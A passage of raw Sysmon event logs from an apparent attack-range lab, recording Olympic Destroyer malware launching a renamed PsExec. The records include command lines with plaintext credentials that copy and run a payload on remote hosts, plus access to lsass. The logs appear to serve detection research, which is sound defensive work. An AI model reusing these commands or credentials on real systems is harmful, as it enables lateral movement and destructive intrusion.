wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291087Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:45.487{C8EA50B7-12ED-6216-7505-000000003802}6740C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\255.255.255.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000291086Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:45.485{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12ED-6216-7505-000000003802}6740C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000291085Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:45.467{C8EA50B7-12ED-6216-7305-000000003802}6636C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000291084Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:45.444{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12ED-6216-7305-000000003802}6636C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291083Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:45.444{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12ED-6216-7305-000000003802}6636C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000291082Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:56:45.429{C8EA50B7-12ED-6216-7305-000000003802}6636C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000291081Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:45.365{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12ED-6216-7405-000000003802}6628C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291080Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:45.365{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12ED-6216-7405-000000003802}6628C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291079Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:45.343{C8EA50B7-12ED-6216-7405-000000003802}66286672C:\Windows\system32\conhost.exe{C8EA50B7-12ED-6216-7305-000000003802}6636C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291078Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:45.328{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12ED-6216-7405-000000003802}6628C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291077Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:45.312{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12ED-6216-7405-000000003802}6628C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291076Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:45.181{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-12ED-6216-7305-000000003802}6636C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291075Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:45.181{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291074Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:45.181{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291073Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:45.181{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291072Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:45.181{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291071Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:45.181{C8EA50B7-12E6-6216-4B05-000000003802}67926872C:\Temp\olympic_destroyer.exe{C8EA50B7-12ED-6216-7305-000000003802}6636C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291070Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:45.183{C8EA50B7-12ED-6216-7305-000000003802}6636C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\255.255.255.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000291069Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:45.181{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12ED-6216-7305-000000003802}6636C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000291068Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:45.096{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=692CEF92015F4E78765AAA562E8FFBEA,SHA256=D586F5058A096496AFC7D7136590C0EB4BEFE920F8BC09D141A066BD953C72DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217668Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:46.277{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6D8C63556F7D16C9B3395DFE42700366,SHA256=659D4D4CE5651AC4459FA7086B4E78911633AF88A54260B98CF12B930506A0FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217667Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:46.277{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=73864DA71468AB1CF2B5A952AAE1CF90,SHA256=E640B87BFDFDB5D2BDDDAFF5FA49127891A84B10812D61736B3432B0BF29122A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217666Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:46.277{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE4B792C97EC638F01F575B7B10DC87F,SHA256=D5AB675A4A2B7BDB343A8B38A126B8E3CA2AF27C672F8A21F82E146BD68F238F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217665Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:46.136{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291211Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.928{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12EE-6216-8405-000000003802}5620C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291210Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.913{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12EE-6216-8305-000000003802}4516C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291209Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.913{C8EA50B7-12E6-6216-4B05-000000003802}67926872C:\Temp\olympic_destroyer.exe{C8EA50B7-12EE-6216-8305-000000003802}4516C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291208Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.918{C8EA50B7-12EE-6216-8305-000000003802}4516C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\255.255.255.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000291207Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.913{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12EE-6216-8305-000000003802}4516C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000291206Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.913{C8EA50B7-12EE-6216-7F05-000000003802}208C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000291205Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.897{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12EE-6216-7F05-000000003802}208C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291204Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.897{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12EE-6216-7F05-000000003802}208C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000291203Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:56:46.882{C8EA50B7-12EE-6216-7F05-000000003802}208C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000291202Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.866{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291201Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 